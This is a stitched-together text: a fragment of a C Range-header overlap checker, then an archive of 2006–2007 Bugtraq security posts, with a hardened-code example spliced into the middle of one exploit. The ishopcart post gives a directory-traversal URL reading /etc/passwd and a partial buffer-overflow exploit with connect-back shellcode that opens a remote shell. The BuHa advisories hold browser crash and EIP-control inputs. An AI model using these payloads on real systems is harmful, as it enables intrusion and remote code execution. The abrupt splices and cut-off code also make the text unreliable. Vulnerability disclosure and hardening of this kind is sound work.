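 * Returns 0 and fills *out with an inclusive, clamped range; -1 if the spec is
 * malformed or unsatisfiable. */
static int parse_spec(const char *s, size_t len, uint64_t file_size,
                      struct byte_range *out)
{
    char buf[64], *dash, *end;
    if (len == 0 || len >= sizeof buf || file_size == 0) return -1;
    memcpy(buf, s, len);
    buf[len] = '\0';
    dash = strchr(buf, '-');
    if (dash == NULL) return -1;
    *dash = '\0';
    const char *a = buf, *b = dash + 1;
    if (*a == '\0') {                        /* suffix form "-N": last N bytes */
        uint64_t n = strtoull(b, &end, 10);
        if (*b == '\0' || *end != '\0' || n == 0) return -1;
        if (n > file_size) n = file_size;
        out->first = file_size - n;
        out->last = file_size - 1;
        return 0;
    }
    uint64_t first = strtoull(a, &end, 10);
    if (*end != '\0' || first >= file_size) return -1;
    uint64_t last = file_size - 1;           /* open-ended "A-" means to EOF */
    if (*b != '\0') {
        last = strtoull(b, &end, 10);
        if (*end != '\0' || last < first) return -1;
        if (last > file_size - 1) last = file_size - 1;
    }
    out->first = first;
    out->last = last;
    return 0;
}

/* Check a Range header value. *total_out receives the number of body bytes
 * that honouring the header literally would emit (the amplification), even
 * when the verdict is RANGE_OVERLAP. Any verdict other than RANGE_OK means:
 * ignore the header and answer 200 with the whole file exactly once. */
enum range_verdict check_range_header(const char *value, uint64_t file_size,
                                      uint64_t *total_out)
{
    struct byte_range r[MAX_RANGES];
    size_t count = 0;
    uint64_t total = 0;
    int overlap = 0;
    if (total_out) *total_out = 0;
    if (strncmp(value, "bytes=", 6) != 0) return RANGE_MALFORMED;
    const char *p = value + 6;
    while (*p != '\0') {
        const char *comma = strchr(p, ',');
        size_t len = comma ? (size_t)(comma - p) : strlen(p);
        while (len > 0 && isspace((unsigned char)*p)) { p++; len--; }
        while (len > 0 && isspace((unsigned char)p[len - 1])) len--;
        if (count == MAX_RANGES) return RANGE_TOO_MANY;
        if (parse_spec(p, len, file_size, &r[count]) != 0) return RANGE_MALFORMED;
        /* "0-,0-,0-": every repeated spec overlaps one parsed earlier */
        for (size_t i = 0; i < count; i++)
            if (r[i].first <= r[count].last && r[count].first <= r[i].last)
                overlap = 1;
        total += r[count].last - r[count].first + 1;
        count++;
        if (comma == NULL) break;
        p = comma + 1;
    }
    if (count == 0) return RANGE_MALFORMED;
    if (total_out) *total_out = total;
    return overlap ? RANGE_OVERLAP : RANGE_OK;
}

int main(void)
{
    /* the quoted example: each "0-" would emit the whole 300 kB file once */
    uint64_t total;
    enum range_verdict v = check_range_header("bytes=0-,0-,0-,0-", 300 * 1024, &total);
    printf("verdict=%d bytes_if_honoured=%llu\n", (int)v, (unsigned long long)total);
    return 0;
}
```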

Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

2007-01-04 Thread bugtraq
A slashdot user suggested the following


One possible work around on the server side:
Direct your web server to serve .pdf files as mime type application/octet
That way the files will be saved to disk instead of opening in the browser 
plug-in.


URL:
http://it.slashdot.org/comments.pl?sid=214868&threshold=1&commentsort=0&mode=thread&cid=17450834

This may cause undesired effects on certain browsers on the other hand. 


- Robert
http://www.cgisecurity.com/ Website Security news, and more
http://www.cgisecurity.com/index.rss [RSS Security Feed]


Re: shopsite advisory

2006-12-12 Thread bugtraq
This issue was fixed in a patch (8.1.3.1) issued in October.  

The announcement from ShopSite is here (see the first item under 
Miscellaneous):

http://support.shopsite.com/kbase/view_answer.php?questionID=S5518


Re: [WEB SECURITY] The state of JavaScript Hacking

2006-11-29 Thread bugtraq
 Mozilla with their XUL makes attackers' life so much easier. It is not
 that the Mozilla browser is vulnerable to any specific type of attack
 but the past has already proved many times that eventually someone
 will find an issue with the architecture. Then people will find the
 same mistake in other places. The Mozilla XUL is considered a true RIA
 (Rich Internet Application) platform that is currently the base of
 many open source products. All of them support JavaScript, CSS, Flash
 (if installed) and Java (if installed). If the developers of these
 applications don't have a deep understanding of the security
 implications of the Mozilla platform the web will suddenly become a very
 dangerous place for them.
 
 Last but not least we have Microsoft with their XAML and WPF (Windows
 Presentation Foundation). I am sure that not that many people have
 heard of these technologies so let me explain what they are in brief.
 They are Microsoft's way to do RIA. The only thing is that they
 rely on .NET3 which makes them explicitly for Windows. I am not sure
 what the state of the MONO project is though.
 
 WPF will allow you to build Rich Internet Applications with XML, CSS
 and .NET. .NET supports many languages one of which is JavaScript. Try
 to do some coding in ASP and you will see that it feels the same as
 browser JavaScript. This is JavaScript on the server, the browser and
 the desktop. It enables web worms and future high-end attackers to a
 degree hardly imaginable by anyone today.


I've been waiting awhile to see someone talk about this! :)

It is good to hear some conversation about XUL and WPF/XAML as these kinds of 
applications/technologies will change the way we use the web. For those who 
know nothing about these technologies, picture a windows application running 
inside of your browser having the same look/feel as a non web application (a 
pretty applet). One of the initial concerns involves the user's inability to 
'be aware of' application changes initiated potentially via XSS or other types 
of script injection. One could XSS a site, change the URL of the site's RIA 
application to their own, and potentially act as a proxy with the real 
application without the user's knowledge. Does anyone know of any decent 
links/tutorials on signing XUL/WPF/XAML apps to prevent such situations?

One of the neat .NET 3.0 features allows a developer to decide at compile time 
if an application is web based or standalone. So for those of you who have 
written applets, instead of modifying code you just change a compile time 
option.

Finally, it is worth noting that Windows executables can be hosted in a window 
(by default) as well as in the browser. In both cases, the code remains the 
same and only needs to be compiled again with a different project property.

- http://msdn.microsoft.com/msdnmag/issues/04/01/DevelopingAppsforLonghorn/


Additional reading for those interested 
http://blogs.msdn.com/mharsh/archive/2006/03/23/559106.aspx
http://msdn2.microsoft.com/en-us/library/ms746927.aspx

Sample applications:
http://www.charlespetzold.com/wpf/

- zeno
http://www.cgisecurity.com Website Security news and more!
http://www.cgisecurity.com/index.rss [RSS Feed]



Challenges faced by automated web application security assessment tools

2006-11-13 Thread bugtraq
There are many challenges that web application security scanners face that are 
widely known within the industry; however, they may not be so obvious to someone 
evaluating a product. For starters, if you think you can just download, install, 
and run a product against any site and get a report outlining all of its risks, 
you'd probably be wrong.

Article:
http://www.cgisecurity.com/articles/scannerchallenges.shtml

- Robert
http://www.cgisecurity.com/ Website Security news and more!
http://www.cgisecurity.com/index.rss [Security RSS Feed]


Assessment of Vista Kernel Mode Security

2006-08-09 Thread ATR-Bugtraq

Everyone - Symantec has just released an in depth report on the security
of the Windows Vista kernel.  This is a detailed technical report that
discusses how Vista boots, how PatchGuard and Code Integrity work, as
well as a technique on how to bypass them.

You can find the paper here:

http://www.symantec.com/avcenter/reference/Windows_Vista_Kernel_Mode_Security.pdf

These technologies introduce a number of concerns for the software
industry. Some of them are discussed here:

http://www.symantec.com/enterprise/security_response/weblog/2006/08/assessment_of_vista_kernel_mod.html

If anyone thinks this is self-serving, it really isn't.  These
technologies have real implications on the future of software
development.


Re: crashing firefox = 1.5.0.4

2006-07-19 Thread bugtraq
I cannot reproduce it with Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; 
rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4.


Are you sure you tested it on a clean install? Because I observed the same 
behaviour several weeks ago and I found it vanished after deactivating the 
LiveHTTPHeaders extension.





Re: phpbb 3.x sql injection (with global moderator rights)

2006-07-15 Thread bugtraq
This issue has been fixed in CVS. I will also remind everyone that 3.0 is beta 
software and has not yet had a security audit, and therefore we do not 
recommend using the beta in a live environment.


I would also like to remind people that in future we would appreciate it if 
such reports could be reported to us first in our security tracker at:

http://www.phpbb.com/security/add_report.php


NeoThermic


Mathcad Area Lock Vulnerability

2006-06-08 Thread bugtraq
Description of Vulnerability



One of the features of Mathcad (www.mathsoft.com) is allowing the user to 
define ‘Areas’. Mathsoft say that ‘You can use areas to protect, lock, or hide 
information or equations in your worksheets’ and that ‘You can also protect the 
contents within the area, so no one else can edit them’. 


Whilst this is true, it is also very easy to unlock these Areas without needing 
the password. In the newer versions of Mathcad (12 onwards) the sheets are 
stored in XML format. This provides an easy means of altering the Mathcad 
sheet, as it is simply plain text. There are 4 vulnerabilities in the way the 
Area locks work:

1.  Password - This attribute is stored as a hashed text string. However 
the hashes produced for the same word on different sheets are always identical. 
For example XfAPUVYgXPg= represents the string password, and could be used 
in any sheet. So it is possible to create another Mathcad sheet, lock an Area 
with a known password and then use a text editor to copy and paste the known 
password over the unknown one.

2.  Timestamp - Like the password string, this can also be changed to be 
any value. So the sheet could be unlocked, modified, relocked and then the date 
of the relocking could be changed to be the original lock date.

3.  Complete removal of lock - Inside the Area tag there is an 
‘is-locked’ attribute. When a lock has been enabled this is set to true. 
However, to remove the lock all that needs to be done is change this value to 
false. For completeness the ‘timestamp’ attribute should be changed to an 
empty string and then the ‘password’ attribute removed, although these last two 
changes are not needed to unlock the Area.

4.  Protection can be bypassed completely - The data stored in the locked 
area can also be viewed in a text editor. So this could also be copied and 
pasted into another sheet, without the lock protection section.


Affected Versions
=================

12, 13, 13.1 (all prior ones are not vulnerable)


Exploit PoC
===========

None required, use a text editor.


ishopcart cgi 0day and multiple vulnerabilities

2006-06-01 Thread bugtraq
Vendor: ishopcart inc
Vendor Site: ishopcart.com
Vendor Status: notified via telephone

While spending a night auditing I have found 2 buffer overflows and 1
directory traversal in the ishopcart cgi, which is written in C. 

The directory traversal is caused by how the cgi chooses to show pages.
If, for example, the CGI is told to show an order form, the order
form's name is taken as argv[1]; the cgi opens this file and prints it, ie:

/cgi-bin/easy-scart.cgi?../../../../../../../etc/passwd

The first buffer overflow is in main()'s szTmp[100] variable. argv[1] is
placed in this variable through a sprintf, although no check is made on
the size of argv[1] before putting it in szTmp:

sprintf(szTmp, "%s", argv[1]);

The other buffer overflow (which I have successfully exploited) lies in
main() also, but is overflowed in vGetPost(). char szBuf[4000]; is
passed to vGetPost() under the circumstance that argv[1] contains
specific criteria. vGetPost() reads POST data until the word Submit is
encountered, doing absolutely no bounds checking on the amount of data
supplied.

When notified via telephone, the author claimed to be in the process of
fixing these errors, and at the same time took ishopcart.com offline.
Provided is the exploit code that spawns a connect back shell. It has been 
tested both locally and remotely and has proved to work 100%.

The real issue lies in the fact that this is a shopping cart system.
Also, since this is a cgi script, apache forks before executing it and
hence does not die on unsuccessful attempts, meaning that combined with
a massive 4000 NOP buffer, brute forcing of the offset is possible
leading to a theoretical 100% probability of remote code execution.

The good news is that this program doesn't seem to be common. If you
would like to view the site and the code, search 'ishopcart' on google
and click its cached link, then hit the source code link and you'll see
easy-scart.c through easy-scart6.c (all of which are vulnerable)

--K-sPecial
/* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: ishopcart-cgi-bof.c (= easy-scart6.c)
 * Date: 5/25/2006
 * Version:
 *  1.00 (5/25/2006) - ishopcart-cgi-bof.c created
 *
 * Description: there is an overflow in the vGetPost() function, it does not do
 *  any size checking on the inputed data but instead reads until the word
 *  Submit is encountered, in turn overflowing pszBuf which points to a 4000
 *  byte buffer in main(). Complete code execution is spawned, with the code
 *  being a connectback shell.
 *
 * Notes: I could not for the life of me find any connect back shellcode that
 *  forks! This code needed to fork because apache was killing the connect back
 *  process as soon as it connected. So, in turn, I have modified netric's
 *  callback shellcode with some forking shellcode to accomplish the workaround.
 *
 * Compile: gcc -o icb ishopcart-cgi-bof.c -std=c99
 */
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <getopt.h>
#include <errno.h>
#include <stdlib.h>

#define PORT        80
#define CB_PORT     31337
#define IP_OFFSET   33 + 13
#define PORT_OFFSET 39 + 13     // + 13 to these for the new forking mod added to cb[]
#define OFFSET      0x41414141  // find your own damn offset, the code works 100% any fault is on yourself

void changeip(char *ip);
void changeport(char *code, int port, int offset);
void help(void);

// netric callback shellcode
char cb[] =
"\x31\xc0\x31\xdb"

"\xb0\x02"       // movb $0x2,%al        / sys_fork (2)
"\xcd\x80"       // int  $0x80
"\x38\xc3"       // cmpl %ebx,%eax       / check if child; %eax = 0x0
"\x74\x05"       // je   0x5             / jump after the exit if we're the child
                 // sys_exit (1)
"\x8d\x43\x01"   // leal 0x1(%ebx),%eax  / sys_exit (1) if we're the parent
"\xcd\x80"       // int  $0x80           / interrupt 80 to execute sys_exit

"\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0"
"\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03"
"\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
"\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89"
"\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";

int main (int argc, char **argv) {
    int sock;
    unsigned offset = OFFSET, ipaddr, i = 0;
    unsigned short port = PORT, cbport = CB_PORT;
    struct sockaddr_in server;
    char 
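As an added example, neither the vendor's code nor the exploit author's, here are the two input paths the advisory describes next to hardened replacements: a bounded, whitelisted page name in place of the unchecked sprintf() into szTmp[100] that also opens whatever path argv[1] names, and a bounded POST reader in place of vGetPost(). BASE_DIR, the allowed-name alphabet and the choice to reject a body that has no Submit marker are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define BASE_DIR "/var/www/ishopcart/pages"   /* hypothetical page directory */
#define NAME_MAX_LEN 99                       /* what the original szTmp[100] can hold */

/* VULNERABLE (as the advisory describes it): argv[1] is copied with no
 * length check and then used verbatim as the file to open, so a long name
 * smashes the stack and "../../../../etc/passwd" is read and printed:
 *
 *     char szTmp[100];
 *     sprintf(szTmp, "%s", argv[1]);
 *     fp = fopen(szTmp, "r");
 */

/* HARDENED: accept only a bare file name made of [A-Za-z0-9_.-], refuse a
 * leading dot (covers ".." and dot-files) and any separator, then build the
 * path under BASE_DIR with a bounded formatter. Returns 0 and fills out on
 * success, -1 otherwise (including when the result would not fit). */
int safe_page_path(const char *name, char *out, size_t outlen)
{
    size_t n = name ? strlen(name) : 0;
    if (n == 0 || n > NAME_MAX_LEN) return -1;
    if (name[0] == '.') return -1;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.')) return -1;  /* no '/' or '\\' */
    }
    if (strstr(name, "..") != NULL) return -1;      /* keep the rule simple: no ".." anywhere */
    int w = snprintf(out, outlen, "%s/%s", BASE_DIR, name);
    if (w < 0 || (size_t)w >= outlen) return -1;    /* truncated: refuse rather than serve */
    return 0;
}

/* VULNERABLE (as described): vGetPost() copies POST data into a 4000-byte
 * buffer until the word "Submit" appears, with no bound on the amount copied.
 *
 * HARDENED: copy at most cap-1 bytes of body into buf, stopping at the marker.
 * Returns the number of bytes stored, or -1 if the marker was not seen before
 * the buffer would overflow or before the body ended; the caller then rejects
 * the request instead of working on a truncated copy. */
long read_post_bounded(const char *body, size_t body_len, char *buf, size_t cap)
{
    const char marker[] = "Submit";
    size_t mlen = sizeof marker - 1, out = 0;
    if (cap == 0) return -1;
    for (size_t i = 0; i < body_len; i++) {
        if (body_len - i >= mlen && memcmp(body + i, marker, mlen) == 0) {
            buf[out] = '\0';
            return (long)out;
        }
        if (out + 1 >= cap) { buf[0] = '\0'; return -1; }   /* would overflow: bail out */
        buf[out++] = body[i];
    }
    buf[0] = '\0';
    return -1;                                           /* no marker within body */
}
```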

[BuHa-Security] MS06-013: HTML Tag Memory Corruption Vulnerability in MS IE 6 SP2

2006-05-26 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #13|May 25th, 2006 |
 ---
| Vendor   | MS Internet Explorer 6.0   |
| URL  | http://www.microsoft.com/windows/ie/   |
| Version  | = 6.0.2900.2180.xpsp_sp2  |
| Risk | Critical (Memory Corruption)   |
 ---

The Microsoft Security Response Center rated the following issues as
critical because, on the face of it, they could produce an exploitable
memory corruption (see HTML Tag Memory Corruption Vulnerability -
CVE-2006-1188 [1]) with a variant of my PoC.

o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Memory Corruption Vulnerability: mshtml.dll#7d519030
=

Following HTML code forces IE 6 to crash:
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html> <fieldset><h4>
 <pre><td>
 <menu>
 <legend>
 <a>
 <ul>
 <small>
 <fieldset>
 <h6>
 </h6>
 </u>
 </optgroup>
 </tr>
 </map>
 </ul>
 </dfn>

 </del>
 </h2>
 </dir>
 </ul>

Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html

These are the register values and the ASM dump at the time of the access
violation:
 eax= ebx=0012e88c ecx= edx=0012e7c0 esi=
 edi=0004 eip=7d519030 esp=0012e780 ebp=0012e894

 7d519012 55               push    ebp
 7d519013 8bec             mov     ebp,esp
 7d519015 8b4104           mov     eax,[ecx+0x4]
 7d519018 394508           cmp     [ebp+0x8],eax
 7d51901b 7c09             jl      mshtml+0x69026 (7d519026)
 7d51901d 7edc             jle     mshtml+0x68ffb (7d518ffb)
 7d51901f 33c0             xor     eax,eax
 7d519021 40               inc     eax
 7d519022 5d               pop     ebp
 7d519023 c20800           ret     0x8
 7d519026 83c8ff           or      eax,0x
 7d519029 ebf7             jmp     mshtml+0x69022 (7d519022)
 7d51902b 90               nop
 7d51902c 90               nop
 7d51902d 90               nop
 7d51902e 90               nop
 7d51902f 90               nop
 FAULT ->7d519030 8b4108  mov     eax,[ecx+0x8]
                          ds:0023:0008=
 7d519033 85c0             test    eax,eax
 7d519035 7425             jz      mshtml+0x6905c (7d51905c)
 7d519037 8b10             mov     edx,[eax]
 7d519039 f6c210           test    dl,0x10
 7d51903c 7408             jz      mshtml+0x69046 (7d519046)
 7d51903e f6c220           test    dl,0x20
 7d519041 7519             jnz     mshtml+0x6905c (7d51905c)
 7d519043 8b400c           mov     eax,[eax+0xc]
 7d519046 8b4808           mov     ecx,[eax+0x8]
 7d519049 85c9             test    ecx,ecx

o Memory Corruption Vulnerability: mshtml.dll#7d529d35
=

Following HTML code forces IE 6 to crash:
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
  "http://www.w3.org/TR/html4/loose.dtd">
 <bdo>
 </span>
 <pre>

 <param>
 <form>
 <colgroup>
 <small>
 </small>
 </colgroup>
 </map>
 </button>
 </code>

 <blockquote>
 <th>
 <small>

 </tbody>
 </tr>
 </ol>
 </tbody>
 </ol>
 </code>
 </strong>


 <head>
 <fieldset>
 <style>

 </style>
 </dir>
 </a>
 </td>
 </li>
 </label>
 </object>
 </bdo>
 </th>
 </object>
 </q>

 <ol>
 <object>

Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html

These are the register values and the ASM dump at the time of the access
violation:
 eax= ebx=0012e88c ecx= edx=0012 esi=00e7dbb0
 edi=0002 eip=7d529d35 esp=0012e778 ebp=0012e778

 7d529d0e e81117           call    mshtml+0x7b424 (7d52b424)
 7d529d13 85c0             test    eax,eax
 7d529d15 0f85c5500800     jne     mshtml!DllGetClassObject+0x10fa2 (7d5aede0)
 7d529d1b 0fb65508         movzx   edx,byte ptr [ebp+0x8]
 7d529d1f 8d84968000       lea     eax,[esi+edx*4+0x80]
 7d529d26 5e               pop     esi
 7d529d27 5d               pop     ebp
 7d529d28 c20c00           ret     0xc
 7d529d2b 90               nop
 7d529d2c 90               nop
 7d529d2d 90               nop
 7d529d2e 90               nop
 7d529d2f 90               nop
 7d529d30 8bff   

[BuHa-Security] DoS Vulnerability in Firefox 1.5.0.1

2006-04-13 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #9 |Apr 12th, 2006 |
 ---
| Vendor   | Mozilla Firefox|
| URL  | http://www.mozilla.com/firefox/|
| Version  | = 1.5.0.1 |
| Risk | Low (DoS - Null Pointer Dereference)   |
 ---

o Description:
=

The award-winning Web browser is better than ever. Browse the Web
with confidence - Firefox protects you from viruses, spyware and
pop-ups. Enjoy improvements to performance, ease of use and privacy.

Visit http://www.mozilla.com/firefox/ for detailed information.

o Denial of Service:
===

Following HTML source forces Firefox = 1.5.0.1 to crash:
 <legend>
  <kbd>
   <object>
    <h4>
   </object>
  </kbd>

Online-demo:
http://morph3us.org/security/pen-testing/firefox/firefox1501-nsBlockFrame.html

The access violation results in a non-exploitable Null Pointer Dereference.

o Disclosure Timeline:
=

01 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
15 Dec 05 - Vendor confirmed vulnerability.
02 Feb 06 - Fixed on 1.x branches.
12 Apr 06 - Public release.

o Solution:
==

The upcoming versions of Firefox (1.0.8 and 1.5.0.2) will address this
issue.

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online:
http://morph3us.org/advisories/20060412-firefox-1501.txt



[BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4

2006-04-13 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #10|Apr 12th, 2006 |
 ---
| Vendor   | W3C's Amaya|
| URL  | http://www.w3.org/Amaya/   |
| Version  | = 9.4 |
| Risk | Critical (Remote Code Execution)   |
 ---

o Description:
=

The current releases, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).

See the Amaya Overview page [1] for more details.

o Stack overflow:


Both of the two below posted code snippets (in fact there are dozens
of possible snippets but all of them trigger the same bug) force
Amaya 9.4 to crash:
 <colgroup compact=Ax200>
  [...]
 <textarea rows=Ax200>

After the first glance at the generated error report and respectively
the ASM code during the access violation I thought I came across a
heap based buffer overflow.

 eax=00f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
 edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
 cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=  efl=00010206

 004edd61 03f3             add     esi,ebx
 004edd63 a4               movsb
 004edd64 8b4500           mov     eax,[ebp]
 004edd67 8b8c241c01       mov     ecx,[esp+0x11c]
 004edd6e 8b94241801       mov     edx,[esp+0x118]
 004edd75 50               push    eax
 004edd76 51               push    ecx
 004edd77 53               push    ebx
 004edd78 52               push    edx
 004edd79 e8a23c0200       call    amaya+0x111a20 (00511a20)
 004edd7e 53               push    ebx
 004edd7f e83cf9           call    amaya+0xfd6c0 (004fd6c0)
 004edd84 83c428           add     esp,0x28
 004edd87 8bbc24fc00       mov     edi,[esp+0xfc]
 004edd8e 8b94240001       mov     edx,[esp+0x100]
 FAULT ->004edd95 8b4240  mov     eax,[edx+0x40]
                          ds:0023:41414181=
 004edd98 83f844           cmp     eax,0x44
 004edd9b 0f852703         jne     amaya+0xee0c8 (004ee0c8)
 004edda1 837c242457       cmp     dword ptr [esp+0x24],0x57
 004edda6 0f846506         je      amaya+0xee411 (004ee411)
 004eddac 8b4500           mov     eax,[ebp]
 004eddaf 8b8c240801       mov     ecx,[esp+0x108]
 004eddb6 6aff             push    0xff
 004eddb8 50               push    eax
 004eddb9 51               push    ecx
 004eddba 57               push    edi
 004eddbb e8d33af1ff       call    amaya+0x1893 (00401893)
 004eddc0 83c410           add     esp,0x10
 004eddc3 5f               pop     edi
 004eddc4 5e               pop     esi
 004eddc5 5d               pop     ebp

After a second, more precise look, the evitable heap overflow turned
out to be a stack based overflow..

We are able to control the EIP:
 <textarea rows=
 A
 A
 A
 

 eax=0001 ebx= ecx=77c10e72 edx=007bd472
 esi=003e edi= eip=42424242 esp=0012ea38 ebp=

 Function: nosymbols
 No prior disassembly possible
 42424242 ?? ???
 42424244 ?? ???
 42424246 ?? ???
 42424248 ?? ???
 4242424a ?? ???
 4242424c ?? ???

Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-textarea-rows.html

In fact, successful exploitation of this vulnerability is not that easy
because non-text characters were modified during parsing, therefore you
have to find a place where to place the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.

o Disclosure Timeline:
=

21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.

o Solution:
==

Upgrade to the latest version of Amaya. [2]

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy 

[BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2

2006-04-13 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #11|Apr 12th, 2006 |
 ---
| Vendor   | W3C's Amaya|
| URL  | http://www.w3.org/Amaya/   |
| Version  | = 9.4 |
| Risk | Critical (Remote Code Execution)   |
 ---

o Description:
=

The current release, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).

See the Amaya Overview page [1] for more details.

o Stack overflow:


The following code snippet forces Amaya 9.4 to crash:
 legend color=Ax200

 eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=
 edi= eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
 cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=  efl=00010206

 00516114 56   pushesi
 00516115 57   pushedi
 00516116 33ff xor edi,edi
 00516118 33f6 xor esi,esi
 0051611a 3bcf cmp ecx,edi
 0051611c 893d943df101 mov [amaya+0x1b13d94
 (01f13d94)],edi
 00516122 7511 jnz amaya+0x116135 (00516135)
 00516124 6a0a push0xa
 00516126 e825d80500   callamaya+0x173950 (00573950)
 0051612b 83c404   add esp,0x4
 0051612e 8bd7 mov edx,edi
 00516130 8bc6 mov eax,esi
 00516132 5f   pop edi
 00516133 5e   pop esi
 00516134 c3   ret
 FAULT -00516135 8b4134   mov eax,[ecx+0x34]
 ds:0023:41414175=
 00516138 3bc7 cmp eax,edi
 0051613a 74f2 jz  amaya+0x11612e (0051612e)
 0051613c 8b4938   mov ecx,[ecx+0x38]
 0051613f 5f   pop edi
 00516140 8bd1 mov edx,ecx
 00516142 5e   pop esi
 00516143 c3   ret
 Nopslide..

We are able to control the EIP:
 legend color=
 A
 A
 AAA

 eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a
 edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=  efl=0202

 Funktion: nosymbols
 No prior disassembly possible
 42424242 ?? ???
 42424244 ?? ???
 42424246 ?? ???
 42424248 ?? ???
 4242424a ?? ???
 4242424c ?? ???

Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html

In fact, successful exploitation of this vulnerability is not that easy
because non-text characters were modified during parsing, therefore you
have to find a place to put the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.

o Disclosure Timeline:
=

21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.

o Solution:
==

Upgrade to the latest version of Amaya. [2]

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online:
http://morph3us.org/advisories/20060412-amaya-94-2.txt

[1] http://www.w3.org/Amaya/Amaya.html
[2] http://www.w3.org/Amaya/User/BinDist.html

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEPYDPkCo6/ctnOpYRA+b0AJ0S4sWE2UE0WjMrFBeRKwmWWd9oIwCfSWdX
MW1HldAZyLYolnZ8k/jA/Vw=
=PeiV
-END PGP SIGNATURE-


[BuHa-Security] Multiple Vulnerabilities in MS IE 6.0 SP2

2006-04-13 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

